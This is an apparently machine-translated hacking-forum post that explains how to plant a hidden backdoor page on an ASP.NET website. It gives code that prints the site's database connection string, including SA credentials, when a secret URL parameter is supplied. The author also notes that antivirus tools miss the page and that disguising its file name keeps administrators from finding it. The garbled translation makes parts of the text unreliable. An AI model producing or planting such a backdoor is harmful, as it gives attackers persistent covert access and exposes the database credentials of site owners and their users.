Leave an YD "backdoor" in the ASP. NET Website"

One night I was thinking about ASP. NET Site to leave that kind of backdoor relatively YD, want to go or no result, start to think of a sentence, but that thing is useful, people don't let you write files are all in vain, leave a pony or a horse? I thought of a very YD door. As for your use of the door, I was prepared to use it (seemingly nonsense) to adapt to the following situations: 1. supports ASP.. NET environment (not supported). 2. this site is applicable to the MSSQL database (which is asp in the system 90% I want to fix. NET + MSSQL. As for ACCESS, you can also create a news publishing system.) 3. web. config contains a connection string (Shenma Web. config? Ask Baidu to go. I cannot explain it clearly. It is a system that usually writes connection strings here to facilitate reuse.) 4. it is best to use the SA permission (otherwise this backdoor will not work) If ASP is used. if you have developed a system in NET, Please bypass it. I believe you should know what I want to say (don't litter bricks and take it back and save it for N years to build a house ). The following is the YD backdoor code: <% @ Page Language = "C #" %> <% @ Import Namespace = "System. configuration "%> <% if (Request. params ["action"] = "len") %> 'prevents anyone from browsing and adding a verification <% = ConfigurationManager. connectionStrings ["constr"] %> 'constr corresponds to the Web. the name value in Config is changed to Web. example of the connection string in Config <connectionStrings> <add name = "constr" connectionString = "Data Source = 127.0.0.1; Initial Catalog = WebDB; User ID = sa; Password =! @ # $12348888; "providerName =" System. data. sqlClient "/> </connectionStrings> on the Web. the connectionStrings node is found in Config, And the add at the next level is the connection string. The constr value corresponds to the use of the constr backdoor in the backdoor (here the backdoor is named demo in the root directory. aspx, any directory name on the site can be used) http://127.0.0.1/demo.asp?action=len View the backdoor in the browser, and the effect is displayed. The damn SQL connection string you want is displayed, and it is the SA permission. What can you do next, don't ask me, action = len. Note that len is case sensitive. Well, the rest of the shoes are used by myself. I just accidentally thought of this. I don't know if you don't need it. Although there are limitations, however, I only know the effect after testing. The advantages of the backdoor are also described. I don't have to think about the first Kill. (360 want to Kill me? Big Brother, that's normal code.) The second permission won't be lost, because I said the first few prerequisites before using it. With the SA permission, you may not allow me to write files, but you still have no permission. In addition, disguise the file name. Do not upload a 1.aspname. You should stop looking for me. Okay, I have to go to bed... I hope to use my shoes.